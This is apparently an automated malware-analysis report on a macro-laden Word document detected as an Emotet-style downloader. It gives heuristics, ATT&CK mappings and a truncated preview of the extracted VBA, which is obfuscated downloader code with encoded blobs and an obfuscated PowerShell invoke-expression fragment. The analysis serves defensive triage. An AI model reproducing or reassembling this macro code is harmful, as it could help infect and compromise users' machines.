Verdict: MALICIOUS
Risk Score: 224

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
The sample contains legacy WordBasic auto-exec markers and a high-confidence firing for VBA macros with CreateObject and execution tokens, indicating malicious intent. The presence of the 'macros.bas' artifact and the ClamAV detection 'Doc.Malware.Emodldr-10025032-0' strongly suggest downloader or dropper functionality. The VBA script, though heavily obfuscated, likely attempts to download and execute a second-stage payload, aligning with the typical behavior of Emodldr variants.
Heuristics (8)

- ClamAV: Doc.Malware.Emodldr-10025032-0 (critical) [CLAMAV_DETECTION]: ClamAV detected this file as malware: Doc.Malware.Emodldr-10025032-0
- VBA macros detected (medium, 3 related findings) [OLE_VBA_MACROS]: Document contains VBA macro code
- AutoOpen macro (high) [OLE_VBA_AUTOOPEN]: AutoOpen macro
- CreateObject call (high) [OLE_VBA_CREATEOBJ]: CreateObject call
- VBA p-code auto-exec with execution tokens (high) [OLE_VBA_PCODE_AUTOEXEC_EXEC]: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker (medium) [OLE_LEGACY_WORDBASIC_AUTOEXEC]: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Suspicious extracted artifact (info) [EXTRACTED_FILE_STATIC_TRIAGE]: One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info) [EMBEDDED_URL]: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. Extracted URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 38954 bytes |

SHA-256: a7b145ff5e81132a0b53dee53f3724905e5687853960364ffdbe15ca46997d46

Detection:
- ClamAV: No threats found
- Obfuscation or payload: likely (carved artifact contains 10 long base64-like blob(s))
Preview script (first 1,000 lines of the extracted script):

```vb
Attribute VB_Name = "QEfRDPmlhzlop"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "HIOMGrCVpC"
Function AHDWkTmlcDCFuF()
On Error Resume Next
ScFarZ = 7873 * 77767
ShqMEU = (76869 + CDate(29238 / Atn(ifjDW)) / 30877 * ORDpCn * 40631 * CInt(bdzija) * rATKtA / CSng(zfRjV))
nvPFp = Tan(78844)
itMLaw = MQPQhE("XX6kXixpn3aaYSDsJfitkWeUVe2j3hHnPCyH9g/M+tLq1fP/KEOWWdlSz/Rj4z7mPllnRE/C9Zf2s8+WAgHC+UvCn/AF8TPlrgfLY/Ae56zqpkP4r23Pjvfg3HI/LAVXgKnS4uT4WBgftDP7A/UOfMdOxyIQX0FfvGKF3gJ69M9J8yv2SvnYXajNmM", 2, 177)
HAzhfL = 17493 * 71399
UFijzn = (66817 + CDate(69432 / Atn(WkvSY)) / 44794 * RNufO * 89342 * CInt(rwdqAl) * hrhYLM / CSng(pJzMit))
Ehpcc = Tan(23212)
PmjbL = 30630 * 42747
snCow = (51790 + CDate(91509 / Atn(zHkjnJ)) / 80159 * MNDlIU * 42808 * CInt(zYwhL) * FYPhbw / CSng(kqcZoj))
nhRFw = Tan(4288)
SlHIJzUdAJt = MQPQhE("aa4K/6KdcdX7VkXqZ6I36MOd6kTTuLLEXGAmRzbj", 2, 34)
wMkFX = 33636 * 90415
XiOjLC = (23495 + CDate(33429 / Atn(irFbX)) / 52150 * UlVTR * 12873 * CInt(kJYGMi) * DhjvSw / CSng(HXwbQ))
XFwob = Tan(71106)
QVcdV = 30870 * 47053
cjqaJ = (36786 + CDate(65877 / Atn(rLVCf)) / 87452 * ajlEvt * 57458 * CInt(CBSsC) * vDTzIq / CSng(TcHEz))
WNwFX = Tan(44183)
IUKMMkTLofz = MQPQhE("BGDKb9y7vfgpu4Twt3104f3Cy4hzDducK7VZj+194/uOnv7lN038J06IrC3QT3q/vUurJ1Izdb23PgZrVbOXs2blVPH908pv32feG8c308sS7YuombFy75sbP3af+rmy/t/djeRzt/Huz7k9n3Ie2be1eF9H22TO/NjkvreM0j4H", 5, 163)
CwjLdU = 96552 * 24832
ZqbjVv = (15248 + CDate(5587 / Atn(XDRGD)) / 58730 * vXHJDw * 90955 * CInt(OuzUH) * osCjD / CSng(dTAaF))
AATVvs = Tan(9593)
iasza = 99013 * 4368
Ifismd = (28640 + CDate(47085 / Atn(iSrzU)) / 87165 * Tduot * 97848 * CInt(YzqqR) * siZHNS / CSng(VMlza))
zOZSQJ = Tan(63162)
TKBzrp = MQPQhE("MYpbf+6fNuijXuX23urG8F2f/HHmHusHbc0+coX5gnGrqFeZ5ovsPkbdW+hQ6o2B9Wd0H6ZnMM4H9kPGT/Gx8Sn736iPy3lK4EzpdQn2cdWZjdo7EA7MbdM+F7hNUv17+FYp/0ekB9nekjqFeBHi", 5, 141)
izENs = 18391 * 22733
swnza = (21079 + CDate(8782 / Atn(jmBrzG)) / 84331 * OuBFzh * 50051 * CInt(kaOjUu) * JpPUp / CSng(dZmJj))
iHpXYF = Tan(18123)
cTvaJL = 7224 * 67622
IQEYk = (63913 + CDate(85669 / Atn(YUvtZ)) / 2248 * iquBRY * 39937 * CInt(IUwui) * BbJrX / CSng(jCWcL))
huHhp = Tan(6244)
ESJrP = MQPQhE("mj0x5Xqqko6mbIn/vmQN3+5pvJ+LhVnw56fyADuIclfkK8SSOq9/Jk+96f/Wuq++fN88qANFDs%", 3, 66)
SrTRC = 34259 * 71304
FvEmmJ = (83891 + CDate(44643 / Atn(mCBtwj)) / 37283 * pOraD * 51679 * CInt(vcQaiK) * ZmTbG / CSng(qZspW))
umBYV = Tan(21373)
zWdWKR = 65856 * 15052
uijlw = (78148 + CDate(1877 / Atn(OwMBKA)) / 43359 * GcCOjF * 93992 * CInt(wzKOmA) * wpADX / CSng(npSVU))
rvapVG = Tan(90924)
naiZX = MQPQhE("5bjv+eomz36DHXqWV/WT4gjcAZ9zPhF2XNd3qrAe8SgPkMdIf9b4pE9g+rGMR7mX2vxiuxsjZWN", 4, 67)
pfsXo = 63836 * 84538
zdmLOZ = (25928 + CDate(22651 / Atn(wwDSm)) / 70529 * MZFwWH * 79184 * CInt(rviTw) * Oqfwqo / CSng(JRShOj))
IrmCu = Tan(99865)
wGMJLa = 14640 * 52387
wjraa = (13136 + CDate(15134 / Atn(YCVhbW)) / 42347 * QShkIG * 58963 * CInt(HCjwwi) * Dpwhn / CSng(kuLHo))
mRQUj = Tan(82224)
QRBnOY = MQPQhE("HQ3HDm/I++GIhPG/EE+6rledleofl", 7, 20)
uHZqR = 85887 * 3578
TYXLw = (89308 + CDate(91352 / Atn(sdpiX)) / 62475 * WdTls * 26196 * CInt(hAFckz) * wholGQ / CSng(ovsaq))
XqtIzN = Tan(67799)
rDvGD = 79683 * 92797
mzYiF = (14319 + CDate(28106 / Atn(TYfjBi)) / 68858 * NwWiap * 44821 * CInt(KDnSA) * jTCCU / CSng(PzIAzj))
kvpPJ = Tan(37314)
hmFWa = MQPQhE("H&( ([sTring]$veRbosEPRefEREnCE)[1,3]+'x'-JoIN'') (&('nE'+'w'+'-obJecT') ('I'+'o.sTREAmRe'+'ADer')(( &('nE'+'w-obJec'+'T') ('io.Co'+'MPRES'+'s'+'iON.'+'DEF'+'LA'+'TEsT'+'re'+'aM')([io.mEMorGnfIl,", 2, 190)
tHTNm = 95695 * 53639
YCUwl = (34688 + CDate(84259 / Atn(dwNuM)) / 30601 * Wlunmb * 40986 * CInt(iwhIYA) * QXNOZG / CSng(BvjskL))
vYGdT = Tan(93527)
AjIcTS = 74396 * 79974
hUsTzX = (63784 + CDate(10345 / Atn(FiDijP)) / 92261 * RwZbj * 95568 * CInt(wFKji) * QGzdpH / CSng(tJDbYj))
olRAs = Tan(63419)
U
```

... (truncated)